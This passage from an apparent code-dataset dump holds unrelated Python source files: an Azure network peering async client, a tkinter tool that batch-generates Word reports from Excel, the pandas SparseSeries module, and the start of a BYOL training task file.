~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2020_03_01.models.VirtualNetworkPeering]\n :raises ~azure.core.exceptions.HttpResponseError:\n \"\"\"\n polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]\n cls = kwargs.pop('cls', None) # type: ClsType[\"models.VirtualNetworkPeering\"]\n lro_delay = kwargs.pop(\n 'polling_interval',\n self._config.polling_interval\n )\n cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]\n if cont_token is None:\n raw_result = await self._create_or_update_initial(\n resource_group_name=resource_group_name,\n virtual_network_name=virtual_network_name,\n virtual_network_peering_name=virtual_network_peering_name,\n virtual_network_peering_parameters=virtual_network_peering_parameters,\n cls=lambda x,y,z: x,\n **kwargs\n )\n\n kwargs.pop('error_map', None)\n kwargs.pop('content_type', None)\n\n def get_long_running_output(pipeline_response):\n deserialized = self._deserialize('VirtualNetworkPeering', pipeline_response)\n\n if cls:\n return cls(pipeline_response, deserialized, {})\n return deserialized\n\n if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)\n elif polling is False: polling_method = AsyncNoPolling()\n else: polling_method = polling\n if cont_token:\n return AsyncLROPoller.from_continuation_token(\n polling_method=polling_method,\n continuation_token=cont_token,\n client=self._client,\n deserialization_callback=get_long_running_output\n )\n else:\n return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)\n begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/virtualNetworkPeerings/{virtualNetworkPeeringName}'} # type: ignore\n\n def list(\n self,\n resource_group_name: str,\n virtual_network_name: str,\n **kwargs\n ) -> AsyncIterable[\"models.VirtualNetworkPeeringListResult\"]:\n \"\"\"Gets all virtual network peerings in a virtual network.\n\n :param resource_group_name: The name of the resource group.\n :type resource_group_name: str\n :param virtual_network_name: The name of the virtual network.\n :type virtual_network_name: str\n :keyword callable cls: A custom type or function that will be passed the direct response\n :return: An iterator like instance of either VirtualNetworkPeeringListResult or the result of cls(response)\n :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_03_01.models.VirtualNetworkPeeringListResult]\n :raises: ~azure.core.exceptions.HttpResponseError\n \"\"\"\n cls = kwargs.pop('cls', None) # type: ClsType[\"models.VirtualNetworkPeeringListResult\"]\n error_map = {\n 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError\n }\n error_map.update(kwargs.pop('error_map', {}))\n api_version = \"2020-03-01\"\n accept = \"application/json\"\n\n def prepare_request(next_link=None):\n # Construct headers\n header_parameters = {} # type: Dict[str, Any]\n header_parameters['Accept'] = self._serialize.header(\"accept\", accept, 'str')\n\n if not next_link:\n # Construct URL\n url = self.list.metadata['url'] # type: ignore\n path_format_arguments = {\n 'resourceGroupName': self._serialize.url(\"resource_group_name\", resource_group_name, 'str'),\n 'virtualNetworkName': self._serialize.url(\"virtual_network_name\", virtual_network_name, 'str'),\n 'subscriptionId': self._serialize.url(\"self._config.subscription_id\", self._config.subscription_id, 'str'),\n }\n url = self._client.format_url(url, **path_format_arguments)\n # Construct parameters\n query_parameters = {} # type: Dict[str, Any]\n query_parameters['api-version'] = self._serialize.query(\"api_version\", api_version, 'str')\n\n request = self._client.get(url, query_parameters, header_parameters)\n else:\n url = next_link\n query_parameters = {} # type: Dict[str, Any]\n request = self._client.get(url, query_parameters, header_parameters)\n return request\n\n async def extract_data(pipeline_response):\n deserialized = self._deserialize('VirtualNetworkPeeringListResult', pipeline_response)\n list_of_elem = deserialized.value\n if cls:\n list_of_elem = cls(list_of_elem)\n return deserialized.next_link or None, AsyncList(list_of_elem)\n\n async def get_next(next_link=None):\n request = prepare_request(next_link)\n\n pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n\n if response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n raise HttpResponseError(response=response, error_format=ARMErrorFormat)\n\n return pipeline_response\n\n return AsyncItemPaged(\n get_next, extract_data\n )\n list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/virtualNetworkPeerings'} # type: ignore\n"} {"ext": "py", "sha": "1a2fc8d575d251990336801076d181ea0608fc89", "content": "from datetime import datetime\nfrom pathlib import Path\nfrom tkinter import *\nfrom tkinter import filedialog\n\nfrom docxtpl import DocxTemplate\nimport xlrd\nimport os\nimport configparser\nimport sys\n\n\ndef resource_path(relative_path):\n if getattr(sys, 'frozen', False):\n base_path = sys._MEIPASS\n else:\n base_path = os.path.dirname(os.path.abspath(__file__))\n print(os.path.join(base_path, relative_path))\n return os.path.join(base_path, relative_path)\n\n\ndef valid_count():\n config = configparser.ConfigParser()\n config.read(resource_path(os.path.join('res', 'conf.ini')), encoding=\"utf8\")\n return config.getint(\"sys_config\", \"totalCount\"), config.getint(\"sys_config\", \"usedCount\")\n\n\ndef update_valid(count):\n config = configparser.ConfigParser()\n config.read(resource_path(os.path.join('res', 'conf.ini')), encoding=\"utf8\")\n config.set(\"sys_config\", \"usedCount\", repr(count))\n config.write(open(resource_path(os.path.join('res', 'conf.ini')), \"w\"))\n\n\nclass Application(Frame):\n def __init__(self, master=None):\n Frame.__init__(self, master, bg='white')\n self.pack(expand=YES, fill=BOTH)\n self.window_init()\n self.createWidgets()\n\n def window_init(self):\n self.master.title('报告批处理系统')\n self.master.bg = 'white'\n width, height = self.master.maxsize()\n self.master.geometry(\"{}x{}\".format(500, 500))\n\n def createWidgets(self):\n # # fm1\n self.fm1 = Frame(self, bg='white')\n self.openButton = Button(self.fm1, text='选择表格文件', bg='#e4e4e5', fg='black', font=('微软雅黑', 12),\n command=self.fileOpen)\n self.openButton.pack(expand=YES)\n self.fm1.pack(side=TOP, pady=10, expand=NO, fill='x')\n\n # fm2\n self.fm2 = Frame(self, bg='white')\n self.predictEntry = Text(self.fm2, font=('微软雅黑', 10), fg='#FF4081', state=DISABLED)\n self.predictEntry.pack(side=LEFT, fill='y', padx=20, expand=YES)\n self.fm2.pack(side=TOP, expand=YES, fill=\"y\")\n\n def output_predict_sentence(self, r):\n # self.predictEntry.delete(0, END)\n self.predictEntry.config(state=NORMAL)\n self.predictEntry.insert(INSERT, r + \"\\n\")\n self.predictEntry.config(state=DISABLED)\n\n def fileOpen(self):\n fileName = filedialog.askopenfilename(title='选择表格文件', filetypes=[('Excel', '*.xlsx')])\n self.read_excel(fileName)\n # self.output_predict_sentence(\"结束\")\n\n def read_excel(self, fileName):\n try:\n self.output_predict_sentence(\"选择文件为:\" + fileName)\n\n my_file = Path(fileName)\n if my_file.exists():\n pass\n else:\n self.output_predict_sentence(\"文件不存在,重新选择文件!\")\n\n my_dir_name = fileName.replace('.xlsx', '')\n my_dir = Path(my_dir_name)\n if my_dir.exists():\n pass\n else:\n os.makedirs(my_dir)\n # self.output_predict_sentence(\"创建存储目录\")\n\n # 打开excel\n x1 = xlrd.open_workbook(fileName)\n # 打开sheet1\n table = x1.sheet_by_index(0)\n nrows = table.nrows\n validCount = valid_count()\n\n if nrows - 2 + validCount[1] > validCount[0]:\n self.output_predict_sentence('数据异常,联系开发人员!')\n return\n\n self.output_predict_sentence('预计生成报告数:' + str(nrows - 2))\n self.output_predict_sentence(\"开始生成报告!\")\n\n for i in range(nrows - 2):\n reqTimeStr = str(table.cell_value(i + 2, 0)).strip()\n companyName = table.cell_value(i + 2, 1)\n if companyName is None:\n break\n productNumber = str(table.cell_value(i + 2, 2)).strip()\n SCCJ = str(table.cell_value(i + 2, 3)).strip()\n productName = str(table.cell_value(i + 2, 4)).strip()\n productTime = table.cell_value(i + 2, 5)\n PH = table.cell_value(i + 2, 6)\n LC = str(table.cell_value(i + 2, 7)).strip()\n GCZCH = table.cell_value(i + 2, 8)\n YJZH = table.cell_value(i + 2, 9)\n CYWZ = str(table.cell_value(i + 2, 10)).strip()\n GH = str(table.cell_value(i + 2, 11)).strip()\n reportTime = str(table.cell_value(i + 2, 12)).strip()\n # 日期转换\n reqTime = datetime.strptime(reqTimeStr, '%Y.%m.%d')\n reportTime = datetime.strptime(reportTime, '%Y.%m.%d')\n\n tpl = DocxTemplate(resource_path(os.path.join('res', 'tempdoc.docx')))\n context = {\n 'companyName': companyName,\n 'productNumber': productNumber,\n # 'SCCJ': SCCJ,\n # 'productName': productName,\n # 'productTime': productTime,\n # 'PH': PH,\n # 'LC': LC,\n # 'GCZCH': GCZCH,\n # 'YJZH': YJZH,\n 'CYWZ': CYWZ,\n 'GH': GH,\n 'reqTime': \"{0:%Y}.{0:%m}.{0:%d}\".format(reqTime),\n 'checkTime': \"{0:%Y}.{0:%m}.{0:%d}\".format(reqTime),\n 'reportTime': \"{0:%Y}.{0:%m}.{0:%d}\".format(reportTime),\n }\n\n if productName == 'None':\n context['productName'] = ''\n else:\n context['productName'] = productName\n\n if LC == 'None':\n context['LC'] = ''\n else:\n context['LC'] = LC\n\n if productTime is None:\n context['productTime'] = ''\n else:\n if isinstance(productTime, float):\n context['productTime'] = int(float(productTime))\n elif isinstance(productTime, int):\n context['productTime'] = int(productTime)\n else:\n context['productTime'] = str(\n productTime).replace('00:00:00+00:00', '')\n\n if PH is None:\n context['PH'] = ''\n else:\n if isinstance(PH, float):\n context['PH'] = int(float(PH))\n else:\n context['PH'] = PH\n\n if SCCJ == 'None':\n context['SCCJ'] = ''\n else:\n context['SCCJ'] = SCCJ\n\n if YJZH is None:\n context['YJZH'] = ''\n else:\n if isinstance(YJZH, float):\n context['YJZH'] = int(float(YJZH))\n else:\n context['YJZH'] = YJZH\n\n if GCZCH is None:\n context['GCZCH'] = ''\n else:\n if isinstance(GCZCH, float):\n context['GCZCH'] = int(float(GCZCH))\n else:\n context['GCZCH'] = GCZCH\n\n temp = str(i + 1)\n saveFileName = my_dir_name + '/' + \\\n companyName.replace('有限公司', '').strip() + '_' + \\\n GH + \"_\" + temp + '.docx'\n # self.output_predict_sentence(\"第\" + temp + \"文件:\" + saveFileName)\n tpl.render(context)\n tpl.save(saveFileName)\n\n update_valid(nrows - 2 + validCount[1])\n self.output_predict_sentence(\"报告生成结束,共生成报告:\" + repr(nrows - 2))\n\n except Exception as err:\n blogpath = resource_path(os.path.join('res', 'log_err.txt'))\n f = open(blogpath, 'w+')\n f.writelines(repr(err))\n f.close()\n self.output_predict_sentence(\"报告生成失败,原因:\" + repr(err))\n\n\nif __name__ == '__main__':\n app = Application()\n app.mainloop()\n"} {"ext": "py", "sha": "1a2fc9698da2f9cf357773e84edacbb806889435", "content": "\"\"\"\nData structures for sparse float data. Life is made simpler by dealing only\nwith float64 data\n\"\"\"\n\n# pylint: disable=E1101,E1103,W0231\n\nfrom numpy import nan, ndarray\nimport numpy as np\nimport warnings\nimport operator\n\nfrom pandas.core.common import isnull, _values_from_object, _maybe_match_name\nfrom pandas.core.index import Index, _ensure_index\nfrom pandas.core.series import Series\nfrom pandas.core.frame import DataFrame\nfrom pandas.core.internals import SingleBlockManager\nfrom pandas.core import generic\nimport pandas.core.common as com\nimport pandas.core.ops as ops\nimport pandas.index as _index\n\nfrom pandas.sparse.array import (make_sparse, _sparse_array_op, SparseArray)\nfrom pandas._sparse import BlockIndex, IntIndex\nimport pandas._sparse as splib\n\nfrom pandas.sparse.scipy_sparse import (_sparse_series_to_coo,\n _coo_to_sparse_series)\n\n# -----------------------------------------------------------------------------\n# Wrapper function for Series arithmetic methods\n\n\ndef _arith_method(op, name, str_rep=None, default_axis=None, fill_zeros=None,\n **eval_kwargs):\n \"\"\"\n Wrapper function for Series arithmetic operations, to avoid\n code duplication.\n\n str_rep, default_axis, fill_zeros and eval_kwargs are not used, but are\n present for compatibility.\n \"\"\"\n\n def wrapper(self, other):\n if isinstance(other, Series):\n if not isinstance(other, SparseSeries):\n other = other.to_sparse(fill_value=self.fill_value)\n return _sparse_series_op(self, other, op, name)\n elif isinstance(other, DataFrame):\n return NotImplemented\n elif np.isscalar(other):\n if isnull(other) or isnull(self.fill_value):\n new_fill_value = np.nan\n else:\n new_fill_value = op(np.float64(self.fill_value),\n np.float64(other))\n\n return SparseSeries(op(self.sp_values, other),\n index=self.index,\n sparse_index=self.sp_index,\n fill_value=new_fill_value,\n name=self.name)\n else: # pragma: no cover\n raise TypeError('operation with %s not supported' % type(other))\n\n wrapper.__name__ = name\n if name.startswith(\"__\"):\n # strip special method names, e.g. `__add__` needs to be `add` when\n # passed to _sparse_series_op\n name = name[2:-2]\n return wrapper\n\n\ndef _sparse_series_op(left, right, op, name):\n left, right = left.align(right, join='outer', copy=False)\n new_index = left.index\n new_name = _maybe_match_name(left, right)\n\n result = _sparse_array_op(left, right, op, name)\n return SparseSeries(result, index=new_index, name=new_name)\n\n\nclass SparseSeries(Series):\n \"\"\"Data structure for labeled, sparse floating point data\n\n Parameters\n ----------\n data : {array-like, Series, SparseSeries, dict}\n kind : {'block', 'integer'}\n fill_value : float\n Defaults to NaN (code for missing)\n sparse_index : {BlockIndex, IntIndex}, optional\n Only if you have one. Mainly used internally\n\n Notes\n -----\n SparseSeries objects are immutable via the typical Python means. If you\n must change values, convert to dense, make your changes, then convert back\n to sparse\n \"\"\"\n _subtyp = 'sparse_series'\n\n def __init__(self, data=None, index=None, sparse_index=None, kind='block',\n fill_value=None, name=None, dtype=None, copy=False,\n fastpath=False):\n\n # we are called internally, so short-circuit\n if fastpath:\n\n # data is an ndarray, index is defined\n data = SingleBlockManager(data, index, fastpath=True)\n if copy:\n data = data.copy()\n else:\n\n if data is None:\n data = []\n\n if isinstance(data, Series) and name is None:\n name = data.name\n\n is_sparse_array = isinstance(data, SparseArray)\n if fill_value is None:\n if is_sparse_array:\n fill_value = data.fill_value\n else:\n fill_value = nan\n\n if is_sparse_array:\n if isinstance(data, SparseSeries) and index is None:\n index = data.index.view()\n elif index is not None:\n assert (len(index) == len(data))\n\n sparse_index = data.sp_index\n data = np.asarray(data)\n\n elif isinstance(data, SparseSeries):\n if index is None:\n index = data.index.view()\n\n # extract the SingleBlockManager\n data = data._data\n\n elif isinstance(data, (Series, dict)):\n if index is None:\n index = data.index.view()\n\n data = Series(data)\n data, sparse_index = make_sparse(data, kind=kind,\n fill_value=fill_value)\n\n elif isinstance(data, (tuple, list, np.ndarray)):\n # array-like\n if sparse_index is None:\n data, sparse_index = make_sparse(data, kind=kind,\n fill_value=fill_value)\n else:\n assert (len(data) == sparse_index.npoints)\n\n elif isinstance(data, SingleBlockManager):\n if dtype is not None:\n data = data.astype(dtype)\n if index is None:\n index = data.index.view()\n else:\n data = data.reindex(index, copy=False)\n\n else:\n\n length = len(index)\n\n if data == fill_value or (isnull(data) and isnull(fill_value)):\n if kind == 'block':\n sparse_index = BlockIndex(length, [], [])\n else:\n sparse_index = IntIndex(length, [])\n data = np.array([])\n\n else:\n if kind == 'block':\n locs, lens = ([0], [length]) if length else ([], [])\n sparse_index = BlockIndex(length, locs, lens)\n else:\n sparse_index = IntIndex(length, index)\n v = data\n data = np.empty(length)\n data.fill(v)\n\n if index is None:\n index = com._default_index(sparse_index.length)\n index = _ensure_index(index)\n\n # create/copy the manager\n if isinstance(data, SingleBlockManager):\n\n if copy:\n data = data.copy()\n else:\n\n # create a sparse array\n if not isinstance(data, SparseArray):\n data = SparseArray(data, sparse_index=sparse_index,\n fill_value=fill_value, dtype=dtype,\n copy=copy)\n\n data = SingleBlockManager(data, index)\n\n generic.NDFrame.__init__(self, data)\n\n self.index = index\n self.name = name\n\n @property\n def values(self):\n \"\"\" return the array \"\"\"\n return self.block.values\n\n def __array__(self, result=None):\n \"\"\" the array interface, return my values \"\"\"\n return self.block.values\n\n def get_values(self):\n \"\"\" same as values \"\"\"\n return self.block.to_dense().view()\n\n @property\n def block(self):\n return self._data._block\n\n @property\n def fill_value(self):\n return self.block.fill_value\n\n @fill_value.setter\n def fill_value(self, v):\n self.block.fill_value = v\n\n @property\n def sp_index(self):\n return self.block.sp_index\n\n @property\n def sp_values(self):\n return self.values.sp_values\n\n @property\n def npoints(self):\n return self.sp_index.npoints\n\n @classmethod\n def from_array(cls, arr, index=None, name=None, copy=False,\n fill_value=None, fastpath=False):\n \"\"\"\n Simplified alternate constructor\n \"\"\"\n return cls(arr, index=index, name=name, copy=copy,\n fill_value=fill_value, fastpath=fastpath)\n\n @property\n def _constructor(self):\n return SparseSeries\n\n @property\n def kind(self):\n if isinstance(self.sp_index, BlockIndex):\n return 'block'\n elif isinstance(self.sp_index, IntIndex):\n return 'integer'\n\n def as_sparse_array(self, kind=None, fill_value=None, copy=False):\n \"\"\" return my self as a sparse array, do not copy by default \"\"\"\n\n if fill_value is None:\n fill_value = self.fill_value\n if kind is None:\n kind = self.kind\n return SparseArray(self.values, sparse_index=self.sp_index,\n fill_value=fill_value, kind=kind, copy=copy)\n\n def __len__(self):\n return len(self.block)\n\n def __unicode__(self):\n # currently, unicode is same as repr...fixes infinite loop\n series_rep = Series.__unicode__(self)\n rep = '%s\\n%s' % (series_rep, repr(self.sp_index))\n return rep\n\n def __array_wrap__(self, result):\n \"\"\"\n Gets called prior to a ufunc (and after)\n \"\"\"\n return self._constructor(result, index=self.index,\n sparse_index=self.sp_index,\n fill_value=self.fill_value,\n copy=False).__finalize__(self)\n\n def __array_finalize__(self, obj):\n \"\"\"\n Gets called after any ufunc or other array operations, necessary\n to pass on the index.\n \"\"\"\n self.name = getattr(obj, 'name', None)\n self.fill_value = getattr(obj, 'fill_value', None)\n\n def _reduce(self, op, name, axis=0, skipna=True, numeric_only=None,\n filter_type=None, **kwds):\n \"\"\" perform a reduction operation \"\"\"\n return op(self.get_values(), skipna=skipna, **kwds)\n\n def __getstate__(self):\n # pickling\n return dict(_typ=self._typ, _subtyp=self._subtyp, _data=self._data,\n fill_value=self.fill_value, name=self.name)\n\n def _unpickle_series_compat(self, state):\n\n nd_state, own_state = state\n\n # recreate the ndarray\n data = np.empty(nd_state[1], dtype=nd_state[2])\n np.ndarray.__setstate__(data, nd_state)\n\n index, fill_value, sp_index = own_state[:3]\n name = None\n if len(own_state) > 3:\n name = own_state[3]\n\n # create a sparse array\n if not isinstance(data, SparseArray):\n data = SparseArray(data, sparse_index=sp_index,\n fill_value=fill_value, copy=False)\n\n # recreate\n data = SingleBlockManager(data, index, fastpath=True)\n generic.NDFrame.__init__(self, data)\n\n self._set_axis(0, index)\n self.name = name\n\n def __iter__(self):\n \"\"\" forward to the array \"\"\"\n return iter(self.values)\n\n def _set_subtyp(self, is_all_dates):\n if is_all_dates:\n object.__setattr__(self, '_subtyp', 'sparse_time_series')\n else:\n object.__setattr__(self, '_subtyp', 'sparse_series')\n\n def _get_val_at(self, loc):\n \"\"\" forward to the array \"\"\"\n return self.block.values._get_val_at(loc)\n\n def __getitem__(self, key):\n \"\"\"\n\n \"\"\"\n try:\n return self._get_val_at(self.index.get_loc(key))\n\n except KeyError:\n if isinstance(key, (int, np.integer)):\n return self._get_val_at(key)\n raise Exception('Requested index not in this series!')\n\n except TypeError:\n # Could not hash item, must be array-like?\n pass\n\n # is there a case where this would NOT be an ndarray?\n # need to find an example, I took out the case for now\n\n key = _values_from_object(key)\n dataSlice = self.values[key]\n new_index = Index(self.index.view(ndarray)[key])\n return self._constructor(dataSlice, index=new_index).__finalize__(self)\n\n def _set_with_engine(self, key, value):\n return self.set_value(key, value)\n\n def abs(self):\n \"\"\"\n Return an object with absolute value taken. Only applicable to objects\n that are all numeric\n\n Returns\n -------\n abs: type of caller\n \"\"\"\n res_sp_values = np.abs(self.sp_values)\n return self._constructor(res_sp_values, index=self.index,\n sparse_index=self.sp_index,\n fill_value=self.fill_value).__finalize__(self)\n\n def get(self, label, default=None):\n \"\"\"\n Returns value occupying requested label, default to specified\n missing value if not present. Analogous to dict.get\n\n Parameters\n ----------\n label : object\n Label value looking for\n default : object, optional\n Value to return if label not in index\n\n Returns\n -------\n y : scalar\n \"\"\"\n if label in self.index:\n loc = self.index.get_loc(label)\n return self._get_val_at(loc)\n else:\n return default\n\n def get_value(self, label, takeable=False):\n \"\"\"\n Retrieve single value at passed index label\n\n Parameters\n ----------\n index : label\n takeable : interpret the index as indexers, default False\n\n Returns\n -------\n value : scalar value\n \"\"\"\n loc = label if takeable is True else self.index.get_loc(label)\n return self._get_val_at(loc)\n\n def set_value(self, label, value, takeable=False):\n \"\"\"\n Quickly set single value at passed label. If label is not contained, a\n new object is created with the label placed at the end of the result\n index\n\n Parameters\n ----------\n label : object\n Partial indexing with MultiIndex not allowed\n value : object\n Scalar value\n takeable : interpret the index as indexers, default False\n\n Notes\n -----\n This method *always* returns a new object. It is not particularly\n efficient but is provided for API compatibility with Series\n\n Returns\n -------\n series : SparseSeries\n \"\"\"\n values = self.to_dense()\n\n # if the label doesn't exist, we will create a new object here\n # and possibily change the index\n new_values = values.set_value(label, value, takeable=takeable)\n if new_values is not None:\n values = new_values\n new_index = values.index\n values = SparseArray(values, fill_value=self.fill_value,\n kind=self.kind)\n self._data = SingleBlockManager(values, new_index)\n self._index = new_index\n\n def _set_values(self, key, value):\n\n # this might be inefficient as we have to recreate the sparse array\n # rather than setting individual elements, but have to convert\n # the passed slice/boolean that's in dense space into a sparse indexer\n # not sure how to do that!\n if isinstance(key, Series):\n key = key.values\n\n values = self.values.to_dense()\n values[key] = _index.convert_scalar(values, value)\n values = SparseArray(values, fill_value=self.fill_value,\n kind=self.kind)\n self._data = SingleBlockManager(values, self.index)\n\n def to_dense(self, sparse_only=False):\n \"\"\"\n Convert SparseSeries to (dense) Series\n \"\"\"\n if sparse_only:\n int_index = self.sp_index.to_int_index()\n index = self.index.take(int_index.indices)\n return Series(self.sp_values, index=index, name=self.name)\n else:\n return Series(self.values.to_dense(), index=self.index,\n name=self.name)\n\n @property\n def density(self):\n r = float(self.sp_index.npoints) / float(self.sp_index.length)\n return r\n\n def copy(self, deep=True):\n \"\"\"\n Make a copy of the SparseSeries. Only the actual sparse values need to\n be copied\n \"\"\"\n new_data = self._data\n if deep:\n new_data = self._data.copy()\n\n return self._constructor(new_data, sparse_index=self.sp_index,\n fill_value=self.fill_value).__finalize__(self)\n\n def reindex(self, index=None, method=None, copy=True, limit=None):\n \"\"\"\n Conform SparseSeries to new Index\n\n See Series.reindex docstring for general behavior\n\n Returns\n -------\n reindexed : SparseSeries\n \"\"\"\n new_index = _ensure_index(index)\n\n if self.index.equals(new_index):\n if copy:\n return self.copy()\n else:\n return self\n return self._constructor(self._data.reindex(new_index, method=method,\n limit=limit, copy=copy),\n index=new_index).__finalize__(self)\n\n def sparse_reindex(self, new_index):\n \"\"\"\n Conform sparse values to new SparseIndex\n\n Parameters\n ----------\n new_index : {BlockIndex, IntIndex}\n\n Returns\n -------\n reindexed : SparseSeries\n \"\"\"\n if not isinstance(new_index, splib.SparseIndex):\n raise TypeError('new index must be a SparseIndex')\n\n block = self.block.sparse_reindex(new_index)\n new_data = SingleBlockManager(block, self.index)\n return self._constructor(new_data, index=self.index,\n sparse_index=new_index,\n fill_value=self.fill_value).__finalize__(self)\n\n def take(self, indices, axis=0, convert=True):\n \"\"\"\n Sparse-compatible version of ndarray.take\n\n Returns\n -------\n taken : ndarray\n \"\"\"\n new_values = SparseArray.take(self.values, indices)\n new_index = self.index.take(indices)\n return self._constructor(new_values,\n index=new_index).__finalize__(self)\n\n def cumsum(self, axis=0, dtype=None, out=None):\n \"\"\"\n Cumulative sum of values. Preserves locations of NaN values\n\n Returns\n -------\n cumsum : Series or SparseSeries\n \"\"\"\n new_array = SparseArray.cumsum(self.values)\n if isinstance(new_array, SparseArray):\n return self._constructor(\n new_array, index=self.index,\n sparse_index=new_array.sp_index).__finalize__(self)\n return Series(new_array, index=self.index).__finalize__(self)\n\n def dropna(self, axis=0, inplace=False, **kwargs):\n \"\"\"\n Analogous to Series.dropna. If fill_value=NaN, returns a dense Series\n \"\"\"\n # TODO: make more efficient\n axis = self._get_axis_number(axis or 0)\n dense_valid = self.to_dense().valid()\n if inplace:\n raise NotImplementedError(\"Cannot perform inplace dropna\"\n \" operations on a SparseSeries\")\n if isnull(self.fill_value):\n return dense_valid\n else:\n dense_valid = dense_valid[dense_valid != self.fill_value]\n return dense_valid.to_sparse(fill_value=self.fill_value)\n\n def shift(self, periods, freq=None):\n \"\"\"\n Analogous to Series.shift\n \"\"\"\n\n # no special handling of fill values yet\n if not isnull(self.fill_value):\n # TODO: kwds is not defined...should this work?\n dense_shifted = self.to_dense().shift(periods, freq=freq, **kwds) # noqa\n return dense_shifted.to_sparse(fill_value=self.fill_value,\n kind=self.kind)\n\n if periods == 0:\n return self.copy()\n\n if freq is not None:\n return self._constructor(\n self.sp_values, sparse_index=self.sp_index,\n index=self.index.shift(periods, freq),\n fill_value=self.fill_value).__finalize__(self)\n\n int_index = self.sp_index.to_int_index()\n new_indices = int_index.indices + periods\n start, end = new_indices.searchsorted([0, int_index.length])\n\n new_indices = new_indices[start:end]\n\n new_sp_index = IntIndex(len(self), new_indices)\n if isinstance(self.sp_index, BlockIndex):\n new_sp_index = new_sp_index.to_block_index()\n\n return self._constructor(self.sp_values[start:end].copy(),\n index=self.index, sparse_index=new_sp_index,\n fill_value=self.fill_value).__finalize__(self)\n\n def combine_first(self, other):\n \"\"\"\n Combine Series values, choosing the calling Series's values\n first. Result index will be the union of the two indexes\n\n Parameters\n ----------\n other : Series\n\n Returns\n -------\n y : Series\n \"\"\"\n if isinstance(other, SparseSeries):\n other = other.to_dense()\n\n dense_combined = self.to_dense().combine_first(other)\n return dense_combined.to_sparse(fill_value=self.fill_value)\n\n def to_coo(self, row_levels=(0, ), column_levels=(1, ), sort_labels=False):\n \"\"\"\n Create a scipy.sparse.coo_matrix from a SparseSeries with MultiIndex.\n\n Use row_levels and column_levels to determine the row and column\n coordinates respectively. row_levels and column_levels are the names\n (labels) or numbers of the levels. {row_levels, column_levels} must be\n a partition of the MultiIndex level names (or numbers).\n\n .. versionadded:: 0.16.0\n\n Parameters\n ----------\n row_levels : tuple/list\n column_levels : tuple/list\n sort_labels : bool, default False\n Sort the row and column labels before forming the sparse matrix.\n\n Returns\n -------\n y : scipy.sparse.coo_matrix\n rows : list (row labels)\n columns : list (column labels)\n\n Examples\n --------\n >>> from numpy import nan\n >>> s = Series([3.0, nan, 1.0, 3.0, nan, nan])\n >>> s.index = MultiIndex.from_tuples([(1, 2, 'a', 0),\n (1, 2, 'a', 1),\n (1, 1, 'b', 0),\n (1, 1, 'b', 1),\n (2, 1, 'b', 0),\n (2, 1, 'b', 1)],\n names=['A', 'B', 'C', 'D'])\n >>> ss = s.to_sparse()\n >>> A, rows, columns = ss.to_coo(row_levels=['A', 'B'],\n column_levels=['C', 'D'],\n sort_labels=True)\n >>> A\n <3x4 sparse matrix of type ''\n with 3 stored elements in COOrdinate format>\n >>> A.todense()\n matrix([[ 0., 0., 1., 3.],\n [ 3., 0., 0., 0.],\n [ 0., 0., 0., 0.]])\n >>> rows\n [(1, 1), (1, 2), (2, 1)]\n >>> columns\n [('a', 0), ('a', 1), ('b', 0), ('b', 1)]\n \"\"\"\n A, rows, columns = _sparse_series_to_coo(self, row_levels,\n column_levels,\n sort_labels=sort_labels)\n return A, rows, columns\n\n @classmethod\n def from_coo(cls, A, dense_index=False):\n \"\"\"\n Create a SparseSeries from a scipy.sparse.coo_matrix.\n\n .. versionadded:: 0.16.0\n\n Parameters\n ----------\n A : scipy.sparse.coo_matrix\n dense_index : bool, default False\n If False (default), the SparseSeries index consists of only the\n coords of the non-null entries of the original coo_matrix.\n If True, the SparseSeries index consists of the full sorted\n (row, col) coordinates of the coo_matrix.\n\n Returns\n -------\n s : SparseSeries\n\n Examples\n ---------\n >>> from scipy import sparse\n >>> A = sparse.coo_matrix(([3.0, 1.0, 2.0], ([1, 0, 0], [0, 2, 3])),\n shape=(3, 4))\n >>> A\n <3x4 sparse matrix of type ''\n with 3 stored elements in COOrdinate format>\n >>> A.todense()\n matrix([[ 0., 0., 1., 2.],\n [ 3., 0., 0., 0.],\n [ 0., 0., 0., 0.]])\n >>> ss = SparseSeries.from_coo(A)\n >>> ss\n 0 2 1\n 3 2\n 1 0 3\n dtype: float64\n BlockIndex\n Block locations: array([0], dtype=int32)\n Block lengths: array([3], dtype=int32)\n \"\"\"\n return _coo_to_sparse_series(A, dense_index=dense_index)\n\n# overwrite series methods with unaccelerated versions\nops.add_special_arithmetic_methods(SparseSeries, use_numexpr=False,\n **ops.series_special_funcs)\nops.add_flex_arithmetic_methods(SparseSeries, use_numexpr=False,\n **ops.series_flex_funcs)\n# overwrite basic arithmetic to use SparseSeries version\n# force methods to overwrite previous definitions.\nops.add_special_arithmetic_methods(SparseSeries, _arith_method,\n radd_func=operator.add, comp_method=None,\n bool_method=None, use_numexpr=False,\n force=True)\n\n\n# backwards compatiblity\nclass SparseTimeSeries(SparseSeries):\n def __init__(self, *args, **kwargs):\n # deprecation TimeSeries, #10890\n warnings.warn(\"SparseTimeSeries is deprecated. Please use \"\n \"SparseSeries\", FutureWarning, stacklevel=2)\n\n super(SparseTimeSeries, self).__init__(*args, **kwargs)\n"} {"ext": "py", "sha": "1a2fca522ef32aec771028190c04f3120ce95cb1", "content": "# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License.\n\n\"\"\"BYOL tasks.\"\"\"\n\nimport random\nfrom typing import Any, Callable, Dict, Optional, Tuple, cast\n\nimport torch\nimport torch.nn.functional as F\nfrom kornia import augmentation as K\nfrom kornia import filters\nfrom kornia.geometry import transform as KorniaTransform\nfrom pytorch_lightning.core.lightning import LightningModule\nfrom torch import Tensor, optim\nfrom torch.autograd import Variable\nfrom torch.nn.modules import BatchNorm1d, 